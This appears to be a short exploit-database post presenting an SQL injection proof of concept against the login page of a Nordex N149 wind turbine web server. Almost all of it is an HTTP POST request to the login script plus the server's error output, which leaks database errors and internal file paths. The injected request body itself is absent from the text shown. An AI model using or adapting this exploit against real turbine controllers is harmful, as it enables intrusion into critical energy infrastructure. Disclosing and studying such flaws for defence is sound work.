Nordex N149/4.0-4.5 – SQL Injection

# Exploit Title: Nordex N149/4.0-4.5 Wind Turbine Web Server – SQL Injection
# Date: 21-05-2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage:
# Tested on: Windows
# Version: N149/4.0-4.5 Wind Turbine
# Category: webapps

—> Proof Of Concept

——– > Request

POST /php/login.php HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept: */*
Referer: http://IpAdress//
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
Host: IPAdress
Accept-Encoding: gzip, deflate
Content-Length: 304
Content-Type: application/x-www-form-urlencoded; charset=UTF-8


——– > Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 261
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=UTF-8
Date: Wed, 16 May 2018 10:49:31 GMT
Vary: Accept-Encoding

<br />
<b>Warning</b>: mysqli::query(): (23000/1062): Duplicate entry
‘_!@4dilemma:1’ for key ‘group_key’ in
<b>/share/HDA_DATA/Web/php/login.php</b> on line <b>46</b><br />
<br />
<b>Notice</b>: Trying to get property of non-object in
<b>/share/HDA_DATA/Web/php/login.php</b> on line <b>47</b><br />
FALSE<br />
<b>Fatal error</b>: Call to a member function free() on boolean in
<b>/share/HDA_DATA/Web/php/login.php</b> on line <b>67</b><br />

Please follow and like us: